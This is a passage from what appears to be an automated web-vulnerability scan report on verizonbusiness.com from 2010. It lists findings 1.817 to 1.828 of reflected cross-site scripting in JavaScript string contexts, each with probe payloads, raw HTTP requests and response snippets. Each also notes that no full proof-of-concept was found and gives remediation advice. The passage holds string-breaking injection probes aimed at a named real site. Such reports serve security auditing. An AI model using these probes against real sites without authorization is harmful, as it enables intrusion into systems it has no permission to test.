Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reportsf655c"%3b6abbaccf2fd/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40300
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/reportsf655c";6abbaccf2fd/rp_2010-data-breach-report_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.817. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2aa6'%3bae41c518bd8 was submitted in the REST URL parameter 3. This input was echoed as c2aa6';ae41c518bd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reports/rp_2010-data-breach-report_en_xg.pdfc2aa6'%3bae41c518bd8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:05:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/reports/rp_2010-data-breach-report_en_xg.pdfc2aa6';ae41c518bd8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.818. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4eef"%3b2dea37016bb was submitted in the REST URL parameter 3. This input was echoed as e4eef";2dea37016bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reports/rp_2010-data-breach-report_en_xg.pdfe4eef"%3b2dea37016bb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:59 GMT
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:04:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/reports/rp_2010-data-breach-report_en_xg.pdfe4eef";2dea37016bb";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.819. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73364'%3b4285cf2cc2a was submitted in the REST URL parameter 1. This input was echoed as 73364';4285cf2cc2a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources73364'%3b4285cf2cc2a/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources73364';4285cf2cc2a/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.820. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b44"%3bee3423c5215 was submitted in the REST URL parameter 1. This input was echoed as e9b44";ee3423c5215 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese9b44"%3bee3423c5215/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:53 GMT
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese9b44";ee3423c5215/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.821. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a211"%3bb9bb8b36654 was submitted in the REST URL parameter 2. This input was echoed as 6a211";b9bb8b36654 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs6a211"%3bb9bb8b36654/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs6a211";b9bb8b36654/sb_cloud-computing-program_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.822. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ddec'%3bba9a3b8f294 was submitted in the REST URL parameter 2. This input was echoed as 3ddec';ba9a3b8f294 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs3ddec'%3bba9a3b8f294/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefs3ddec';ba9a3b8f294/sb_cloud-computing-program_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.823. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 927f6'%3b532bfe2ead2 was submitted in the REST URL parameter 3. This input was echoed as 927f6';532bfe2ead2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf927f6'%3b532bfe2ead2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='%u/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf927f6';532bfe2ead2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.824. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc630"%3b871d246c950 was submitted in the REST URL parameter 3. This input was echoed as bc630";871d246c950 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdfbc630"%3b871d246c950 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdfbc630";871d246c950";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.825. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcfe9'%3b8b602109b78 was submitted in the REST URL parameter 1. This input was echoed as fcfe9';8b602109b78 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfcfe9'%3b8b602109b78/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40746
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesfcfe9';8b602109b78/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.826. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 978f5"%3ba110e3078be was submitted in the REST URL parameter 1. This input was echoed as 978f5";a110e3078be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources978f5"%3ba110e3078be/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40744
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources978f5";a110e3078be/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTI
...[SNIP]...

1.827. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0bb5"%3bb33da51790e was submitted in the REST URL parameter 2. This input was echoed as d0bb5";b33da51790e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefsd0bb5"%3bb33da51790e/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40354
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefsd0bb5";b33da51790e/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//
...[SNIP]...

1.828. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd27e'%3b22427f4824 was submitted in the REST URL parameter 2. This input was echoed as cd27e';22427f4824 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

